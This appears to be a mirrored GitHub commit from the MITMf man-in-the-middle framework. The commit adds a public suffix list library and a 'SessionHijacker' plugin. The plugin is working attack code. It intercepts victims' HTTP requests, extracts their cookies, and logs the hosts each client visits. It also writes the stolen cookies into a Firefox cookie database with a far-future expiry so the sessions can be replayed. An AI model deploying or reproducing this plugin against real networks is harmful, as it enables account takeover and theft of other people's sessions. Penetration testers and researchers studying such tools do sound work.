mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 21:42:17 -07:00
added SessionHijacker plugin
This commit is contained in:
parent
0190104de5
commit
60548c92bd
3 changed files with 5140 additions and 0 deletions
106
libs/publicsuffix.py
Normal file
106
libs/publicsuffix.py
Normal file
|
@ -0,0 +1,106 @@
|
||||||
|
"""Public Suffix List module for Python.
|
||||||
|
"""
|
||||||
|
|
||||||
|
import codecs
|
||||||
|
import os.path
|
||||||
|
|
||||||
|
class PublicSuffixList(object):
|
||||||
|
def __init__(self, input_file=None):
|
||||||
|
"""Reads and parses public suffix list.
|
||||||
|
|
||||||
|
input_file is a file object or another iterable that returns
|
||||||
|
lines of a public suffix list file. If input_file is None, an
|
||||||
|
UTF-8 encoded file named "publicsuffix.txt" in the same
|
||||||
|
directory as this Python module is used.
|
||||||
|
|
||||||
|
The file format is described at http://publicsuffix.org/list/
|
||||||
|
"""
|
||||||
|
|
||||||
|
if input_file is None:
|
||||||
|
input_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt')
|
||||||
|
input_file = codecs.open(input_path, "r", "utf8")
|
||||||
|
|
||||||
|
root = self._build_structure(input_file)
|
||||||
|
self.root = self._simplify(root)
|
||||||
|
|
||||||
|
def _find_node(self, parent, parts):
|
||||||
|
if not parts:
|
||||||
|
return parent
|
||||||
|
|
||||||
|
if len(parent) == 1:
|
||||||
|
parent.append({})
|
||||||
|
|
||||||
|
assert len(parent) == 2
|
||||||
|
negate, children = parent
|
||||||
|
|
||||||
|
child = parts.pop()
|
||||||
|
|
||||||
|
child_node = children.get(child, None)
|
||||||
|
|
||||||
|
if not child_node:
|
||||||
|
children[child] = child_node = [0]
|
||||||
|
|
||||||
|
return self._find_node(child_node, parts)
|
||||||
|
|
||||||
|
def _add_rule(self, root, rule):
|
||||||
|
if rule.startswith('!'):
|
||||||
|
negate = 1
|
||||||
|
rule = rule[1:]
|
||||||
|
else:
|
||||||
|
negate = 0
|
||||||
|
|
||||||
|
parts = rule.split('.')
|
||||||
|
self._find_node(root, parts)[0] = negate
|
||||||
|
|
||||||
|
def _simplify(self, node):
|
||||||
|
if len(node) == 1:
|
||||||
|
return node[0]
|
||||||
|
|
||||||
|
return (node[0], dict((k, self._simplify(v)) for (k, v) in node[1].items()))
|
||||||
|
|
||||||
|
def _build_structure(self, fp):
|
||||||
|
root = [0]
|
||||||
|
|
||||||
|
for line in fp:
|
||||||
|
line = line.strip()
|
||||||
|
if line.startswith('//') or not line:
|
||||||
|
continue
|
||||||
|
|
||||||
|
self._add_rule(root, line.split()[0].lstrip('.'))
|
||||||
|
|
||||||
|
return root
|
||||||
|
|
||||||
|
def _lookup_node(self, matches, depth, parent, parts):
|
||||||
|
if parent in (0, 1):
|
||||||
|
negate = parent
|
||||||
|
children = None
|
||||||
|
else:
|
||||||
|
negate, children = parent
|
||||||
|
|
||||||
|
matches[-depth] = negate
|
||||||
|
|
||||||
|
if depth < len(parts) and children:
|
||||||
|
for name in ('*', parts[-depth]):
|
||||||
|
child = children.get(name, None)
|
||||||
|
if child is not None:
|
||||||
|
self._lookup_node(matches, depth+1, child, parts)
|
||||||
|
|
||||||
|
def get_public_suffix(self, domain):
|
||||||
|
"""get_public_suffix("www.example.com") -> "example.com"
|
||||||
|
|
||||||
|
Calling this function with a DNS name will return the
|
||||||
|
public suffix for that name.
|
||||||
|
|
||||||
|
Note that for internationalized domains the list at
|
||||||
|
http://publicsuffix.org uses decoded names, so it is
|
||||||
|
up to the caller to decode any Punycode-encoded names.
|
||||||
|
"""
|
||||||
|
|
||||||
|
parts = domain.lower().lstrip('.').split('.')
|
||||||
|
hits = [None] * len(parts)
|
||||||
|
|
||||||
|
self._lookup_node(hits, 1, self.root, parts)
|
||||||
|
|
||||||
|
for i, what in enumerate(hits):
|
||||||
|
if what is not None and what == 0:
|
||||||
|
return '.'.join(parts[i:])
|
4909
libs/publicsuffix.txt
Normal file
4909
libs/publicsuffix.txt
Normal file
File diff suppressed because it is too large
Load diff
125
plugins/SessionHijacker.py
Normal file
125
plugins/SessionHijacker.py
Normal file
|
@ -0,0 +1,125 @@
|
||||||
|
#Almost all of the Firefox related code was stolen from Glenn's Firelamb.
|
||||||
|
#glenn@sensepost.com
|
||||||
|
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from sslstrip.URLMonitor import URLMonitor
|
||||||
|
from libs.publicsuffix import PublicSuffixList
|
||||||
|
from urlparse import urlparse
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
import logging
|
||||||
|
import sqlite3
|
||||||
|
import threading
|
||||||
|
|
||||||
|
class SessionHijacker(Plugin):
|
||||||
|
name = "Session Hijacker"
|
||||||
|
optname = "hijack"
|
||||||
|
desc = "Performs session hijacking attacks against clients"
|
||||||
|
implements = ["cleanHeaders"] #["handleHeader"]
|
||||||
|
has_opts = True
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
self.options = options
|
||||||
|
self.log_clients = options.clients
|
||||||
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
|
self.psl = PublicSuffixList()
|
||||||
|
self.firefox = options.firefox
|
||||||
|
self.save_dir = "./logs"
|
||||||
|
self.seen_hosts = {}
|
||||||
|
self.sql_conns = {}
|
||||||
|
self.html_header="<h2>Cookies sniffed for the following domains\n<hr>\n<br>"
|
||||||
|
|
||||||
|
#Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
|
||||||
|
#SQLite version 3.7.0 or later. You won't be able to read the database files
|
||||||
|
#with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
|
||||||
|
#or is not a database" message.
|
||||||
|
|
||||||
|
sqlv = sqlite3.sqlite_version.split('.')
|
||||||
|
if (sqlv[0] <3 or sqlv[1] < 7):
|
||||||
|
sys.exit("[-] sqlite3 version 3.7 or greater required")
|
||||||
|
|
||||||
|
if not os.path.exists("./logs"):
|
||||||
|
os.makedirs("./logs")
|
||||||
|
|
||||||
|
print "[*] Session Hijacker plugin online"
|
||||||
|
|
||||||
|
def cleanHeaders(self, request): # Client => Server
|
||||||
|
headers = request.getAllHeaders().copy()
|
||||||
|
client_ip = request.getClientIP()
|
||||||
|
|
||||||
|
if 'cookie' in headers:
|
||||||
|
message = "%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])
|
||||||
|
|
||||||
|
if self.firefox:
|
||||||
|
url = "http://" + headers['host'] + request.getPathFromUri()
|
||||||
|
for cookie in headers['cookie'].split(';'):
|
||||||
|
eq = cookie.find("=")
|
||||||
|
cname = str(cookie)[0:eq].strip()
|
||||||
|
cvalue = str(cookie)[eq+1:].strip()
|
||||||
|
#t = threading.Thread(name='firefoxdb', target=self.firefoxdb, args=(headers['host'], cname, cvalue, url, client_ip))
|
||||||
|
#t.setDaemon(True)
|
||||||
|
#t.start()
|
||||||
|
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)
|
||||||
|
else:
|
||||||
|
logging.info(message)
|
||||||
|
|
||||||
|
|
||||||
|
#def handleHeader(self, request, key, value): # Server => Client
|
||||||
|
# if 'set-cookie' in request.client.headers:
|
||||||
|
# cookie = request.client.headers['set-cookie']
|
||||||
|
# #host = request.client.headers['host'] #wtf????
|
||||||
|
# message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie)
|
||||||
|
# if self.urlMonitor.isClientLogging() is True:
|
||||||
|
# self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
|
||||||
|
# else:
|
||||||
|
# logging.info(message)
|
||||||
|
|
||||||
|
def firefoxdb(self, host, cookie_name, cookie_value, url, ip):
|
||||||
|
|
||||||
|
session_dir=self.save_dir + "/" + ip
|
||||||
|
cookie_file=session_dir +'/cookies.sqlite'
|
||||||
|
cookie_file_exists = os.path.exists(cookie_file)
|
||||||
|
|
||||||
|
if (ip not in (self.sql_conns and os.listdir("./logs"))):
|
||||||
|
|
||||||
|
try:
|
||||||
|
if not os.path.exists(session_dir):
|
||||||
|
os.makedirs(session_dir)
|
||||||
|
|
||||||
|
db = sqlite3.connect(cookie_file, isolation_level=None)
|
||||||
|
self.sql_conns[ip] = db.cursor()
|
||||||
|
|
||||||
|
if not cookie_file_exists:
|
||||||
|
self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
|
||||||
|
self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
|
||||||
|
except Exception, e:
|
||||||
|
print str(e)
|
||||||
|
|
||||||
|
scheme = urlparse(url).scheme
|
||||||
|
scheme = (urlparse(url).scheme)
|
||||||
|
basedomain = self.psl.get_public_suffix(host)
|
||||||
|
address = urlparse(url).hostname
|
||||||
|
short_url = scheme + "://"+ address
|
||||||
|
|
||||||
|
log = open(session_dir + '/visited.html','a')
|
||||||
|
if (ip not in self.seen_hosts):
|
||||||
|
self.seen_hosts[ip] = {}
|
||||||
|
log.write(self.html_header)
|
||||||
|
|
||||||
|
if (address not in self.seen_hosts[ip]):
|
||||||
|
self.seen_hosts[ip][address] = 1
|
||||||
|
log.write("\n<br>\n<a href='%s'>%s</a>" %(short_url, address))
|
||||||
|
|
||||||
|
log.close()
|
||||||
|
|
||||||
|
if address == basedomain:
|
||||||
|
address = "." + address
|
||||||
|
|
||||||
|
expire_date = 2000000000 #Year2033
|
||||||
|
now = int(time.time()) - 600
|
||||||
|
self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))
|
||||||
|
|
||||||
|
def add_options(self, options):
|
||||||
|
options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
|
Loading…
Add table
Add a link
Reference in a new issue